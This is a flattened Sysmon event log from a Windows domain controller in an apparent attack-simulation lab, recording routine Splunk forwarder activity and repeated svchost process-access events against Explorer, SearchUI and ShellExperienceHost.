Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=78FFC68B55788172C6F01776E1175A4A,SHA256=7EFF8D2B790A6CE455B9D8C44CE8A2AF78181139506EC2EC15800E71AC1D548F,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002199862Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:51:01.903{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local55083-false10.0.1.12-8000- 23542300x80000000000000002199900Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:51:07.673{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=38A2E115C531C6E5CE2587021778B7B4,SHA256=4BB1D99479283C6E027FF10A698B803C03E75A75C9DE0315A231386433CE03C6,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002199899Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:51:07.173{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-9A00-603E-9E07-00000000AD01}4168C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002199898Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:51:07.173{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-9A00-603E-9E07-00000000AD01}4168C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002199897Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:51:07.173{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-9A00-603E-9E07-00000000AD01}4168C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002199896Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:51:07.173{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-842F-603E-1200-00000000AD01}392C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002199895Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:51:07.173{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-842F-603E-1200-00000000AD01}392C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002199894Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:51:07.173{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99FF-603E-9D07-00000000AD01}2780C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002199893Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:51:07.173{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99FF-603E-9D07-00000000AD01}2780C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002199892Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:51:07.173{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99FF-603E-9D07-00000000AD01}2780C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002199891Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:51:07.173{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99FF-603E-9D07-00000000AD01}2780C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002199890Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:51:07.173{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99FF-603E-9D07-00000000AD01}2780C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002199889Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:51:07.173{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99FF-603E-9D07-00000000AD01}2780C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002199888Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:51:07.173{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99FF-603E-9D07-00000000AD01}2780C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002199887Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:51:07.173{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99FF-603E-9D07-00000000AD01}2780C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002199886Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:51:07.173{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99FF-603E-9D07-00000000AD01}2780C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002199885Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:51:07.173{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99FF-603E-9D07-00000000AD01}2780C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002199884Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:51:07.173{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002199883Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:51:07.173{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002199882Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:51:07.173{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002199881Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:51:07.173{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002199880Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:51:07.173{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002199879Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:51:07.173{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002199878Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:51:07.173{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002199877Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:51:07.173{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002199876Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:51:07.173{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002199875Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:51:07.173{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002199874Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:51:07.173{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002199873Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:51:07.173{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002199872Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:51:07.173{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002199871Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:51:07.173{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002199870Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:51:07.173{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002199869Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 